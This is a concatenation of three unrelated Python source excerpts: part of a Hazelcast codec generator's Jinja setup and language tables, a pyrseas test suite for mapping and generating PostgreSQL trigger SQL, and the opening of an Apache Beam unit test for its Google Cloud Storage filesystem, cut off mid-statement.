with open(file, mode, newline="\n") as file:
file.writelines(content.replace("!codec_hash!", codec_hash))
def get_protocol_versions(protocol_defs, custom_codec_defs):
protocol_versions = set()
if not custom_codec_defs:
custom_codec_defs = []
else:
custom_codec_defs = custom_codec_defs[0]["customTypes"]
for service in protocol_defs:
for method in service["methods"]:
protocol_versions.add(method["since"])
for req_param in method["request"].get("params", []):
protocol_versions.add(req_param["since"])
for res_param in method["response"].get("params", []):
protocol_versions.add(res_param["since"])
for event in method.get("events", []):
protocol_versions.add(event["since"])
for event_param in event.get("params", []):
protocol_versions.add(event_param["since"])
for custom_codec in custom_codec_defs:
protocol_versions.add(custom_codec["since"])
for param in custom_codec.get("params", []):
protocol_versions.add(param["since"])
return map(str, protocol_versions)
class SupportedLanguages(Enum):
JAVA = "java"
CPP = "cpp"
CS = "cs"
PY = "py"
TS = "ts"
# GO = 'go'
MD = "md"
codec_output_directories = {
SupportedLanguages.JAVA: "hazelcast/src/main/java/com/hazelcast/client/impl/protocol/codec/",
SupportedLanguages.CPP: "hazelcast/generated-sources/src/hazelcast/client/protocol/codec/",
SupportedLanguages.CS: "src/Hazelcast.Net/Protocol/Codecs/",
SupportedLanguages.PY: "hazelcast/protocol/codec/",
SupportedLanguages.TS: "src/codec/",
# SupportedLanguages.GO: 'internal/proto/'
SupportedLanguages.MD: "documentation",
}
custom_codec_output_directories = {
SupportedLanguages.JAVA: "hazelcast/src/main/java/com/hazelcast/client/impl/protocol/codec/custom/",
SupportedLanguages.CPP: "hazelcast/generated-sources/src/hazelcast/client/protocol/codec/",
SupportedLanguages.CS: "src/Hazelcast.Net/Protocol/CustomCodecs/",
SupportedLanguages.PY: "hazelcast/protocol/codec/custom/",
SupportedLanguages.TS: "src/codec/custom",
# SupportedLanguages.GO: 'internal/proto/'
}
def _capitalized_name_generator(extension):
def inner(*names):
return "%sCodec.%s" % ("".join(map(capital, names)), extension)
return inner
def _snake_cased_name_generator(extension):
def inner(*names):
return "%s_codec.%s" % ("_".join(map(py_param_name, names)), extension)
return inner
file_name_generators = {
SupportedLanguages.JAVA: _capitalized_name_generator("java"),
SupportedLanguages.CPP: _snake_cased_name_generator("cpp"),
SupportedLanguages.CS: _capitalized_name_generator("cs"),
SupportedLanguages.PY: _snake_cased_name_generator("py"),
SupportedLanguages.TS: _capitalized_name_generator("ts"),
# SupportedLanguages.GO: 'go'
SupportedLanguages.MD: "md",
}
language_specific_funcs = {
"lang_types_encode": {
SupportedLanguages.JAVA: java_types_encode,
SupportedLanguages.CS: cs_types_encode,
SupportedLanguages.CPP: cpp_types_encode,
SupportedLanguages.TS: ts_types_encode,
SupportedLanguages.PY: py_types_encode_decode,
SupportedLanguages.MD: lambda x: x,
},
"lang_types_decode": {
SupportedLanguages.JAVA: java_types_decode,
SupportedLanguages.CS: cs_types_decode,
SupportedLanguages.CPP: cpp_types_decode,
SupportedLanguages.TS: ts_types_decode,
SupportedLanguages.PY: py_types_encode_decode,
SupportedLanguages.MD: lambda x: x,
},
"lang_name": {
SupportedLanguages.JAVA: java_name,
SupportedLanguages.CS: cs_name,
SupportedLanguages.CPP: cpp_name,
SupportedLanguages.TS: java_name,
SupportedLanguages.PY: java_name,
SupportedLanguages.MD: lambda x: x,
},
"param_name": {
SupportedLanguages.JAVA: param_name,
SupportedLanguages.CS: param_name,
SupportedLanguages.CPP: param_name,
SupportedLanguages.TS: param_name,
SupportedLanguages.PY: py_param_name,
SupportedLanguages.MD: lambda x: x,
},
"escape_keyword": {
SupportedLanguages.JAVA: lambda x: x,
SupportedLanguages.CS: cs_escape_keyword,
SupportedLanguages.CPP: lambda x: x,
SupportedLanguages.TS: ts_escape_keyword,
SupportedLanguages.PY: py_escape_keyword,
SupportedLanguages.MD: lambda x: x,
},
"get_import_path_holders": {
SupportedLanguages.JAVA: lambda x: x,
SupportedLanguages.CS: lambda x: x,
SupportedLanguages.CPP: lambda x: x,
SupportedLanguages.TS: ts_get_import_path_holders,
SupportedLanguages.PY: py_get_import_path_holders,
SupportedLanguages.MD: lambda x: x,
},
}
language_service_ignore_list = {
SupportedLanguages.JAVA: set(),
SupportedLanguages.CPP: cpp_ignore_service_list,
SupportedLanguages.CS: cs_ignore_service_list,
SupportedLanguages.PY: py_ignore_service_list,
SupportedLanguages.TS: ts_ignore_service_list,
# SupportedLanguages.GO: set()
}
def create_environment(lang, namespace):
env = Environment(
loader=PackageLoader(lang.value, "."),
extensions=["jinja2.ext.do", "jinja2.ext.loopcontrols"],
)
env.trim_blocks = True
env.lstrip_blocks = True
env.keep_trailing_newline = False
env.filters["capital"] = capital
env.globals["to_upper_snake_case"] = to_upper_snake_case
env.globals["fixed_params"] = fixed_params
env.globals["var_size_params"] = var_size_params
env.globals["new_params"] = new_params
env.globals["filter_new_params"] = filter_new_params
env.globals["is_var_sized_list"] = is_var_sized_list
env.globals["is_var_sized_list_contains_nullable"] = is_var_sized_list_contains_nullable
env.globals["is_var_sized_entry_list"] = is_var_sized_entry_list
env.globals["is_var_sized_map"] = is_var_sized_map
env.globals["item_type"] = item_type
env.globals["key_type"] = key_type
env.globals["value_type"] = value_type
env.globals["namespace"] = namespace
env.globals["lang_types_encode"] = language_specific_funcs["lang_types_encode"][lang]
env.globals["lang_types_decode"] = language_specific_funcs["lang_types_decode"][lang]
env.globals["lang_name"] = language_specific_funcs["lang_name"][lang]
env.globals["param_name"] = language_specific_funcs["param_name"][lang]
env.globals["escape_keyword"] = language_specific_funcs["escape_keyword"][lang]
env.globals["get_size"] = get_size
env.globals["is_trivial"] = is_trivial
env.globals["get_import_path_holders"] = language_specific_funcs["get_import_path_holders"][
lang
]
return env
|
|
# -*- coding: utf-8 -*-
"""Test triggers"""
import pytest
from pyrseas.testutils import DatabaseToMapTestCase
from pyrseas.testutils import InputMapToSqlTestCase, fix_indent
FUNC_SRC = "BEGIN NEW.c3 := CURRENT_DATE; RETURN NEW; END"
FUNC_INSTEAD_SRC = "BEGIN INSERT INTO t1 VALUES (NEW.c1, NEW.c2, now()); " \
"RETURN NULL; END"
CREATE_TABLE_STMT = "CREATE TABLE sd.t1 (c1 integer, c2 text, " \
"c3 date)"
CREATE_TABLE_STMT2 = "CREATE TABLE t1 (c1 integer, c2 text, " \
"c3 text, tsidx tsvector)"
CREATE_FUNC_STMT = "CREATE FUNCTION sd.f1() RETURNS trigger LANGUAGE plpgsql" \
" AS $_$%s$_$" % FUNC_SRC
CREATE_STMT = "CREATE TRIGGER tr1 BEFORE INSERT OR UPDATE ON sd.t1 " \
"FOR EACH ROW EXECUTE PROCEDURE sd.f1()"
COMMENT_STMT = "COMMENT ON TRIGGER tr1 ON sd.t1 IS 'Test trigger tr1'"
class TriggerToMapTestCase(DatabaseToMapTestCase):
"""Test mapping of existing triggers"""
def test_map_trigger1(self):
"Map a simple trigger"
stmts = [CREATE_TABLE_STMT, CREATE_FUNC_STMT, CREATE_STMT]
dbmap = self.to_map(stmts)
assert dbmap['schema sd']['table t1']['triggers'] == {
'tr1': {'timing': 'before', 'events': ['insert', 'update'],
'level': 'row', 'procedure': 'sd.f1'}}
def test_map_trigger2(self):
"Map another simple trigger with different attributes"
stmts = [CREATE_TABLE_STMT, CREATE_FUNC_STMT,
"CREATE TRIGGER tr1 AFTER DELETE OR TRUNCATE ON t1 "
"EXECUTE PROCEDURE f1()"]
dbmap = self.to_map(stmts)
assert dbmap['schema sd']['table t1']['triggers'] == {
'tr1': {'timing': 'after', 'events': ['delete', 'truncate'],
'level': 'statement', 'procedure': 'sd.f1'}}
def test_map_trigger_update_cols(self):
"Map trigger with UPDATE OF columns"
stmts = [CREATE_TABLE_STMT, CREATE_FUNC_STMT,
"CREATE TRIGGER tr1 AFTER INSERT OR UPDATE OF c1, c2 ON t1 "
"FOR EACH ROW EXECUTE PROCEDURE f1()"]
dbmap = self.to_map(stmts)
assert dbmap['schema sd']['table t1']['triggers'] == {
'tr1': {'timing': 'after', 'events': ['insert', 'update'],
'columns': ['c1', 'c2'], 'level': 'row',
'procedure': 'sd.f1'}}
def test_map_trigger_conditional(self):
"Map trigger with a WHEN qualification"
stmts = [CREATE_TABLE_STMT, CREATE_FUNC_STMT,
"CREATE TRIGGER tr1 AFTER UPDATE ON t1 FOR EACH ROW "
"WHEN (OLD.c2 IS DISTINCT FROM NEW.c2) "
"EXECUTE PROCEDURE f1()"]
dbmap = self.to_map(stmts)
assert dbmap['schema sd']['table t1']['triggers'] == {
'tr1': {'timing': 'after', 'events': ['update'],
'level': 'row', 'procedure': 'sd.f1',
'condition': '(old.c2 IS DISTINCT FROM new.c2)'}}
def test_map_trigger_instead(self):
"Map an INSTEAD OF trigger"
stmts = [CREATE_TABLE_STMT, "CREATE VIEW v1 AS SELECT c1, c2 FROM t1",
"CREATE FUNCTION f1() RETURNS trigger LANGUAGE plpgsql AS "
"$_$%s$_$" % FUNC_INSTEAD_SRC,
"CREATE TRIGGER tr1 INSTEAD OF INSERT ON v1 "
"FOR EACH ROW EXECUTE PROCEDURE f1()"]
dbmap = self.to_map(stmts)
assert dbmap['schema sd']['view v1']['triggers'] == {
'tr1': {'timing': 'instead of', 'events': ['insert'],
'level': 'row', 'procedure': 'sd.f1'}}
def test_map_tsvector_trigger(self):
"Map a text search (tsvector) trigger"
stmts = [
CREATE_TABLE_STMT2,
"CREATE TRIGGER tr1 BEFORE INSERT OR UPDATE ON sd.t1 "
"FOR EACH ROW EXECUTE PROCEDURE "
"tsvector_update_trigger('tsidx', 'pg_catalog.english', 'c2')"]
dbmap = self.to_map(stmts)
assert dbmap['schema sd']['table t1']['triggers'] == {
'tr1': {'timing': 'before', 'events': ['insert', 'update'],
'level': 'row',
'procedure': {'name': 'tsvector_update_trigger',
'arguments':
"'tsidx', 'pg_catalog.english', 'c2'"}}}
def test_map_trigger_function_distinct_schemas(self):
"Map a trigger in a non-default schema with function in different one"
stmts = ["CREATE SCHEMA s1", "CREATE TABLE s1.t1 (c1 integer, "
"c2 text, c3 date)", "CREATE SCHEMA s2",
"CREATE FUNCTION s2.f1() RETURNS trigger LANGUAGE plpgsql AS "
"$_$%s$_$" % FUNC_SRC,
"CREATE TRIGGER tr1 BEFORE INSERT OR UPDATE ON s1.t1 "
"FOR EACH ROW EXECUTE PROCEDURE s2.f1()"]
dbmap = self.to_map(stmts)
assert dbmap['schema s1']['table t1']['triggers'] == {
'tr1': {'timing': 'before', 'events': ['insert', 'update'],
'level': 'row', 'procedure': 's2.f1'}}
def test_map_trigger_comment(self):
"Map a trigger comment"
stmts = [CREATE_TABLE_STMT, CREATE_FUNC_STMT, CREATE_STMT,
COMMENT_STMT]
dbmap = self.to_map(stmts)
assert dbmap['schema sd']['table t1']['triggers']['tr1'][
'description'] == 'Test trigger tr1'
class ConstraintTriggerToMapTestCase(DatabaseToMapTestCase):
"""Test mapping of existing constraint triggers"""
def test_map_trigger(self):
"Map a simple constraint trigger"
stmts = [CREATE_TABLE_STMT, CREATE_FUNC_STMT,
"CREATE CONSTRAINT TRIGGER tr1 AFTER INSERT OR UPDATE ON t1 "
"FOR EACH ROW EXECUTE PROCEDURE f1()"]
dbmap = self.to_map(stmts)
assert dbmap['schema sd']['table t1']['triggers'] == {
'tr1': {'constraint': True, 'timing': 'after',
'events': ['insert', 'update'], 'level': 'row',
'procedure': 'sd.f1'}}
def test_map_trigger_deferrable(self):
"Map a deferrable, initially deferred constraint trigger"
stmts = [CREATE_TABLE_STMT, CREATE_FUNC_STMT,
"CREATE CONSTRAINT TRIGGER tr1 AFTER INSERT OR UPDATE ON t1 "
"DEFERRABLE INITIALLY DEFERRED "
"FOR EACH ROW EXECUTE PROCEDURE f1()"]
dbmap = self.to_map(stmts)
assert dbmap['schema sd']['table t1']['triggers'] == {
'tr1': {'constraint': True, 'deferrable': True,
'initially_deferred': True, 'timing': 'after',
'events': ['insert', 'update'], 'level': 'row',
'procedure': 'sd.f1'}}
class TriggerToSqlTestCase(InputMapToSqlTestCase):
"""Test SQL generation from input triggers"""
def test_create_trigger1(self):
"Create a simple trigger"
inmap = self.std_map(plpgsql_installed=True)
inmap['schema sd'].update({'function f1()': {
'language': 'plpgsql', 'returns': 'trigger', 'source': FUNC_SRC}})
inmap['schema sd'].update({'table t1': {
'columns': [{'c1': {'type': 'integer'}}, {'c2': {'type': 'text'}},
{'c3': {'type': 'date'}}],
'triggers': {'tr1': {
'timing': 'before', 'events': ['insert', 'update'],
'level': 'row', 'procedure': 'sd.f1'}}}})
sql = self.to_sql(inmap)
crt0, crt1 = (0, 1) if 'TABLE' in sql[0] else (1, 0)
assert fix_indent(sql[crt0]) == CREATE_TABLE_STMT
assert fix_indent(sql[crt1]) == CREATE_FUNC_STMT
assert fix_indent(sql[2]) == CREATE_STMT
def test_create_trigger2(self):
"Create another simple trigger with"
inmap = self.std_map(plpgsql_installed=True)
inmap['schema sd'].update({'function f1()': {
'language': 'plpgsql', 'returns': 'trigger', 'source': FUNC_SRC}})
inmap['schema sd'].update({'table t1': {
'columns': [{'c1': {'type': 'integer'}}, {'c2': {'type': 'text'}},
{'c3': {'type': 'date'}}],
'triggers': {'tr1': {'timing': 'after',
'events': ['delete', 'truncate'],
'procedure': 'sd.f1'}}}})
sql = self.to_sql(inmap)
crt0, crt1 = (0, 1) if 'TABLE' in sql[0] else (1, 0)
assert fix_indent(sql[crt0]) == CREATE_TABLE_STMT
assert fix_indent(sql[crt1]) == CREATE_FUNC_STMT
assert fix_indent(sql[2]) == "CREATE TRIGGER tr1 AFTER DELETE OR " \
"TRUNCATE ON sd.t1 FOR EACH STATEMENT EXECUTE PROCEDURE sd.f1()"
def test_create_trigger_update_cols(self):
"Create a trigger with UPDATE OF columns"
inmap = self.std_map()
inmap['schema sd'].update({'function f1()': {
'language': 'plpgsql', 'returns': 'trigger', 'source': FUNC_SRC}})
inmap['schema sd'].update({'table t1': {
'columns': [{'c1': {'type': 'integer'}}, {'c2': {'type': 'text'}},
{'c3': {'type': 'date'}}],
'triggers': {'tr1': {'timing': 'before', 'events': [
'insert', 'update'], 'columns': ['c1', 'c2'], 'level': 'row',
'procedure': 'sd.f1'}}}})
sql = self.to_sql(inmap)
crt0, crt1 = (0, 1) if 'TABLE' in sql[0] else (1, 0)
assert fix_indent(sql[crt0]) == CREATE_TABLE_STMT
assert fix_indent(sql[crt1]) == CREATE_FUNC_STMT
assert fix_indent(sql[2]) == "CREATE TRIGGER tr1 BEFORE INSERT OR " \
"UPDATE OF c1, c2 ON sd.t1 FOR EACH ROW EXECUTE PROCEDURE sd.f1()"
def test_create_trigger_conditional(self):
"Create a trigger with a WHEN qualification"
inmap = self.std_map()
inmap['schema sd'].update({'function f1()': {
'language': 'plpgsql', 'returns': 'trigger', 'source': FUNC_SRC}})
inmap['schema sd'].update({'table t1': {
'columns': [{'c1': {'type': 'integer'}}, {'c2': {'type': 'text'}},
{'c3': {'type': 'date'}}],
'triggers': {'tr1': {'timing': 'before', 'events': [
'update'], 'level': 'row', 'procedure': 'sd.f1',
'condition': '(old.c2 IS DISTINCT FROM new.c2)'}}}})
sql = self.to_sql(inmap)
crt0, crt1 = (0, 1) if 'TABLE' in sql[0] else (1, 0)
assert fix_indent(sql[crt0]) == CREATE_TABLE_STMT
assert fix_indent(sql[crt1]) == CREATE_FUNC_STMT
assert fix_indent(sql[2]) == "CREATE TRIGGER tr1 BEFORE UPDATE " \
"ON sd.t1 FOR EACH ROW WHEN ((old.c2 IS DISTINCT FROM new.c2)) " \
"EXECUTE PROCEDURE sd.f1()"
def test_create_trigger_instead(self):
"Create an INSTEAD OF trigger"
inmap = self.std_map(plpgsql_installed=True)
inmap['schema sd'].update({'function f1()': {
'language': 'plpgsql', 'returns': 'trigger',
'source': FUNC_INSTEAD_SRC}})
inmap['schema sd'].update({'table t1': {
'columns': [{'c1': {'type': 'integer'}}, {'c2': {'type': 'text'}},
{'c3': {'type': 'date'}}]},
'view v1': {'definition': "SELECT c1, c2 FROM t1",
'triggers': {'tr1': {'timing': 'instead of',
'events': ['insert'],
'level': 'row',
'procedure': 'sd.f1'}}}})
sql = self.to_sql(inmap)
assert fix_indent(sql[0]) == CREATE_TABLE_STMT
cr1, cr2 = (1, 2) if 'VIEW' in sql[1] else (2, 1)
assert fix_indent(sql[cr1]) == \
"CREATE VIEW sd.v1 AS SELECT c1, c2 FROM t1"
assert fix_indent(sql[cr2]) == "CREATE FUNCTION sd.f1() RETURNS " \
"trigger LANGUAGE plpgsql AS $_$%s$_$" % FUNC_INSTEAD_SRC
assert fix_indent(sql[3]) == "CREATE TRIGGER tr1 INSTEAD OF INSERT " \
"ON sd.v1 FOR EACH ROW EXECUTE PROCEDURE sd.f1()"
def test_add_tsvector_trigger(self):
"Add a text search (tsvector) trigger"
inmap = self.std_map()
inmap['schema sd'].update({'table t1': {
'columns': [{'c1': {'type': 'integer'}}, {'c2': {'type': 'text'}},
{'c3': {'type': 'text'}},
{'tsidx': {'type': 'tsvector'}}],
'triggers': {'t1_tsidx_update': {
'timing': 'before',
'events': ['insert', 'update'], 'level': 'row',
'procedure': {'name': 'tsvector_update_trigger',
'arguments':
"'tsidx', 'pg_catalog.english', 'c2'"}}}}})
sql = self.to_sql(inmap, [CREATE_TABLE_STMT2])
assert fix_indent(sql[0]) == "CREATE TRIGGER t1_tsidx_update BEFORE" \
" INSERT OR UPDATE ON sd.t1 FOR EACH ROW EXECUTE PROCEDURE " \
"tsvector_update_trigger('tsidx', 'pg_catalog.english', 'c2')"
def test_change_tsvector_trigger(self):
"Change a text search (tsvector) trigger"
inmap = self.std_map()
inmap['schema sd'].update({'table t1': {
'columns': [{'c1': {'type': 'integer'}}, {'c2': {'type': 'text'}},
{'c3': {'type': 'text'}},
{'tsidx': {'type': 'tsvector'}}],
'triggers': {'t1_tsidx_update': {
'timing': 'before', 'events': ['insert', 'update'],
'level': 'row',
'procedure': {'name': "tsvector_update_trigger",
'arguments':
"'tsidx', 'pg_catalog.english', 'c2', 'c3'"}}}}})
stmts = [CREATE_TABLE_STMT2,
"CREATE TRIGGER t1_tsidx_update BEFORE INSERT OR UPDATE ON "
"t1 FOR EACH ROW EXECUTE PROCEDURE tsvector_update_trigger"
"('tsidx', 'pg_catalog.english', 'c2')"]
sql = self.to_sql(inmap, stmts)
assert sql[0] == "DROP TRIGGER t1_tsidx_update ON sd.t1"
assert fix_indent(sql[1]) == "CREATE TRIGGER t1_tsidx_update BEFORE" \
" INSERT OR UPDATE ON sd.t1 FOR EACH ROW EXECUTE PROCEDURE " \
"tsvector_update_trigger('tsidx', 'pg_catalog.english', " \
"'c2', 'c3')"
def test_create_trigger_function_distinct_schemas(self):
"Create a trigger in non-default schema with function in different one"
inmap = self.std_map(plpgsql_installed=True)
inmap.update({'schema s2': {'function f1()': {
'language': 'plpgsql', 'returns': 'trigger', 'source': FUNC_SRC}},
'schema s1': {
'table t1': {
'columns': [
{'c1': {'type': 'integer'}},
{'c2': {'type': 'text'}},
{'c3': {'type': 'date'}}],
'triggers': {'tr1': {
'timing': 'before',
'events': ['insert', 'update'],
'level': 'row', 'procedure': 's2.f1'}}}}})
sql = self.to_sql(inmap, ["CREATE SCHEMA s1", "CREATE SCHEMA s2"])
assert fix_indent(sql[2]) == "CREATE TRIGGER tr1 BEFORE INSERT OR " \
"UPDATE ON s1.t1 FOR EACH ROW EXECUTE PROCEDURE s2.f1()"
def test_drop_trigger(self):
"Drop an existing trigger"
stmts = [CREATE_TABLE_STMT, CREATE_FUNC_STMT, CREATE_STMT]
inmap = self.std_map(plpgsql_installed=True)
inmap['schema sd'].update({'function f1()': {
'language': 'plpgsql', 'returns': 'trigger', 'source': FUNC_SRC}})
inmap['schema sd'].update({'table t1': {
'columns': [{'c1': {'type': 'integer'}}, {'c2': {'type': 'text'}},
{'c3': {'type': 'date'}}]}})
sql = self.to_sql(inmap, stmts)
assert sql == ["DROP TRIGGER tr1 ON sd.t1"]
def test_drop_trigger_table(self):
"Drop an existing trigger and the related table"
stmts = [CREATE_TABLE_STMT, CREATE_FUNC_STMT, CREATE_STMT]
inmap = self.std_map(plpgsql_installed=True)
inmap['schema sd'].update({'function f1()': {
'language': 'plpgsql', 'returns': 'trigger', 'source': FUNC_SRC}})
sql = self.to_sql(inmap, stmts)
assert sql[0] == "DROP TRIGGER tr1 ON sd.t1"
assert sql[1] == "DROP TABLE sd.t1"
def test_trigger_with_comment(self):
"Create a trigger with a comment"
inmap = self.std_map(plpgsql_installed=True)
inmap['schema sd'].update({'function f1()': {
'language': 'plpgsql', 'returns': 'trigger', 'source': FUNC_SRC}})
inmap['schema sd'].update({'table t1': {
'columns': [{'c1': {'type': 'integer'}}, {'c2': {'type': 'text'}},
{'c3': {'type': 'date'}}],
'triggers': {'tr1': {
'description': 'Test trigger tr1',
'timing': 'before', 'events': ['insert', 'update'],
'level': 'row', 'procedure': 'sd.f1'}}}})
sql = self.to_sql(inmap)
crt0, crt1 = (0, 1) if 'TABLE' in sql[0] else (1, 0)
assert fix_indent(sql[crt0]) == CREATE_TABLE_STMT
assert fix_indent(sql[crt1]) == CREATE_FUNC_STMT
assert fix_indent(sql[2]) == CREATE_STMT
assert sql[3] == COMMENT_STMT
def test_comment_on_trigger(self):
"Create a comment on an existing trigger"
stmts = [CREATE_TABLE_STMT, CREATE_FUNC_STMT, CREATE_STMT]
inmap = self.std_map(plpgsql_installed=True)
inmap['schema sd'].update({'function f1()': {
'language': 'plpgsql', 'returns': 'trigger', 'source': FUNC_SRC}})
inmap['schema sd'].update({'table t1': {
'columns': [{'c1': {'type': 'integer'}}, {'c2': {'type': 'text'}},
{'c3': {'type': 'date'}}],
'triggers': {'tr1': {
'description': 'Test trigger tr1',
'timing': 'before', 'events': ['insert', 'update'],
'level': 'row', 'procedure': 'sd.f1'}}}})
sql = self.to_sql(inmap, stmts)
assert sql == [COMMENT_STMT]
def test_drop_trigger_comment(self):
"Drop a comment on an existing trigger"
stmts = [CREATE_TABLE_STMT, CREATE_FUNC_STMT, CREATE_STMT,
COMMENT_STMT]
inmap = self.std_map(plpgsql_installed=True)
inmap['schema sd'].update({'function f1()': {
'language': 'plpgsql', 'returns': 'trigger', 'source': FUNC_SRC}})
inmap['schema sd'].update({'table t1': {
'columns': [{'c1': {'type': 'integer'}}, {'c2': {'type': 'text'}},
{'c3': {'type': 'date'}}],
'triggers': {'tr1': {
'timing': 'before', 'events': ['insert', 'update'],
'level': 'row', 'procedure': 'sd.f1'}}}})
sql = self.to_sql(inmap, stmts)
assert sql == ["COMMENT ON TRIGGER tr1 ON sd.t1 IS NULL"]
def test_change_trigger_comment(self):
"Change existing comment on a trigger"
stmts = [CREATE_TABLE_STMT, CREATE_FUNC_STMT, CREATE_STMT,
COMMENT_STMT]
inmap = self.std_map(plpgsql_installed=True)
inmap['schema sd'].update({'function f1()': {
'language': 'plpgsql', 'returns': 'trigger', 'source': FUNC_SRC}})
inmap['schema sd'].update({'table t1': {
'columns': [{'c1': {'type': 'integer'}}, {'c2': {'type': 'text'}},
{'c3': {'type': 'date'}}],
'triggers': {'tr1': {
'description': 'Changed trigger tr1',
'timing': 'before', 'events': ['insert', 'update'],
'level': 'row', 'procedure': 'sd.f1'}}}})
sql = self.to_sql(inmap, stmts)
assert sql == [
"COMMENT ON TRIGGER tr1 ON sd.t1 IS 'Changed trigger tr1'"]
class ConstraintTriggerToSqlTestCase(InputMapToSqlTestCase):
"""Test SQL generation from input triggers"""
def test_create_trigger(self):
"Create a constraint trigger"
inmap = self.std_map(plpgsql_installed=True)
inmap['schema sd'].update({'function f1()': {
'language': 'plpgsql', 'returns': 'trigger', 'source': FUNC_SRC}})
inmap['schema sd'].update({'table t1': {
'columns': [{'c1': {'type': 'integer'}}, {'c2': {'type': 'text'}},
{'c3': {'type': 'date'}}],
'triggers': {'tr1': {
'constraint': True, 'timing': 'after',
'events': ['insert', 'update'], 'level': 'row',
'procedure': 'sd.f1'}}}})
sql = self.to_sql(inmap)
crt0, crt1 = (0, 1) if 'TABLE' in sql[0] else (1, 0)
assert fix_indent(sql[crt0]) == CREATE_TABLE_STMT
assert fix_indent(sql[crt1]) == CREATE_FUNC_STMT
assert fix_indent(sql[2]) == "CREATE CONSTRAINT TRIGGER tr1 AFTER " \
"INSERT OR UPDATE ON sd.t1 FOR EACH ROW EXECUTE PROCEDURE sd.f1()"
def test_create_trigger_deferrable(self):
"Create a deferrable constraint trigger"
inmap = self.std_map(plpgsql_installed=True)
inmap['schema sd'].update({'function f1()': {
'language': 'plpgsql', 'returns': 'trigger', 'source': FUNC_SRC}})
inmap['schema sd'].update({'table t1': {
'columns': [{'c1': {'type': 'integer'}}, {'c2': {'type': 'text'}},
{'c3': {'type': 'date'}}],
'triggers': {'tr1': {
'constraint': True, 'deferrable': True,
'initially_deferred': True, 'timing': 'after',
'events': ['insert', 'update'], 'level': 'row',
'procedure': 'sd.f1'}}}})
sql = self.to_sql(inmap)
crt0, crt1 = (0, 1) if 'TABLE' in sql[0] else (1, 0)
assert fix_indent(sql[crt0]) == CREATE_TABLE_STMT
assert fix_indent(sql[crt1]) == CREATE_FUNC_STMT
assert fix_indent(sql[2]) == "CREATE CONSTRAINT TRIGGER tr1 " \
"AFTER INSERT OR UPDATE ON sd.t1 DEFERRABLE INITIALLY " \
"DEFERRED FOR EACH ROW EXECUTE PROCEDURE sd.f1()"
|
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Unit tests for GCS File System."""
from __future__ import absolute_import
import logging
import unittest
from builtins import zip
import mock
from apache_beam.io.filesystem import BeamIOError
from apache_beam.io.filesystem import FileMetadata
from apache_beam.options.pipeline_options import PipelineOptions
# Protect against environments where apitools library is not available.
# pylint: disable=wrong-import-order, wrong-import-position
try:
from apache_beam.io.gcp import gcsfilesystem
except ImportError:
gcsfilesystem = None
# pylint: enable=wrong-import-order, wrong-import-position
@unittest.skipIf(gcsfilesystem is None, 'GCP dependencies are not installed')
class GCSFileSystemTest(unittest.TestCase):
def setUp(self):
pipeline_options = PipelineOptions()
self.fs = gcsfilesystem.GCSFileSystem(pipeline_options=pipeline_options)
def test_scheme(self):
self.assertEqual(self.fs.scheme(), 'gs')
self.assertEqual(gcsfilesystem.GCSFileSystem.scheme(), 'gs')
def test_join(self):
self.assertEqual('gs://bucket/path/to/file',
self.fs.join('gs://bucket/path', 'to', 'file'))
self.assertEqual('gs://bucket/path/to/file',
self.fs.join('gs://bucket/path', 'to/file'))
self.assertEqual('gs://bucket/path/to/file',
self.fs.join('gs://bucket/path', '/to/file'))
self.assertEqual('gs://bucket/path/to/file',
self.fs.join('gs://bucket/path/', 'to', 'file'))
self.assertEqual('gs://bucket/path/to/file',
self.fs.join('gs://bucket/path/', 'to/file'))
self.assertEqual('gs://bucket/path/to/file',
self.fs.join('gs://bucket/path/', '/to/file'))
with self.assertRaises(ValueError):
self.fs.join('/bucket/path/', '/to/file')
def test_split(self):
self.assertEqual(('gs://foo/bar', 'baz'),
self.fs.split('gs://foo/bar/baz'))
self.assertEqual(('gs://foo', ''),
self.fs.split('gs://foo/'))
self.assertEqual(('gs://foo', ''),
self.fs.split('gs://foo'))
with self.assertRaises(ValueError):
self.fs.split('/no/gcs/prefix')
@mock.patch('apache_beam.io.gcp.gcsfilesystem.gcsio')
def test_match_multiples(self, mock_gcsio):
# Prepare mocks.
gcsio_mock = mock.MagicMock()
gcsfilesystem.gcsio.GcsIO = lambda: gcsio_mock
gcsio_mock.list_prefix.return_value = {
'gs://bucket/file1': 1,
'gs://bucket/file2': 2
}
expected_results = set([
FileMetadata('gs://bucket/file1', 1),
FileMetadata('gs://bucket/file2', 2)
])
match_result = self.fs.match(['gs://bucket/'])[0]
self.assertEqual(
set(match_result.metadata_list),
expected_results)
gcsio_mock.list_prefix.assert_called_once_with('gs://bucket/')
@mock.patch('apache_beam.io.gcp.gcsfilesystem.gcsio')
def test_match_multiples_limit(self, mock_gcsio):
# Prepare mocks.
gcsio_mock = mock.MagicMock()
limit = 1
gcsfilesystem.gcsio.GcsIO = lambda: gcsio_mock
gcsio_mock.list_prefix.return_value = {
'gs://bucket/file1': 1
}
expected_results = set([
FileMetadata('gs://bucket/file1', 1)
])
match_result = self.fs.match(['gs://bucket/'], [limit])[0]
self.assertEqual(
set(match_result.metadata_list),
expected_results)
self.assertEqual(
len(match_result.metadata_list),
limit)
gcsio_mock.list_prefix.assert_called_once_with('gs://bucket/')
@mock.patch('apache_beam.io.gcp.gcsfilesystem.gcsio')
def test_match_multiples_error(self, mock_gcsio):
# Prepare mocks.
gcsio_mock = mock.MagicMock()
gcsfilesystem.gcsio.GcsIO = lambda: gcsio_mock
exception = IOError('Failed')
gcsio_mock.list_prefix.side_effect = exception
with self.assertRaisesRegexp(BeamIOError,
r'^Match operation failed') as error:
self.fs.match(['gs://bucket/'])
self.assertRegexpMatches(str(error.exception.exception_details),
r'gs://bucket/.*%s' % exception)
gcsio_mock.list_prefix.assert_called_once_with('gs://bucket/')
@mock.patch('apache_beam.io.gcp.gcsfilesystem.gcsio')
def test_match_multiple_patterns(self, mock_gcsio):
# Prepare mocks.
gcsio_mock = mock.MagicMock()
gcsfilesystem.gcsio.GcsIO = lambda: gcsio_mock
gcsio_mock.list_prefix.side_effect = [
{'gs://bucket/file1': 1},
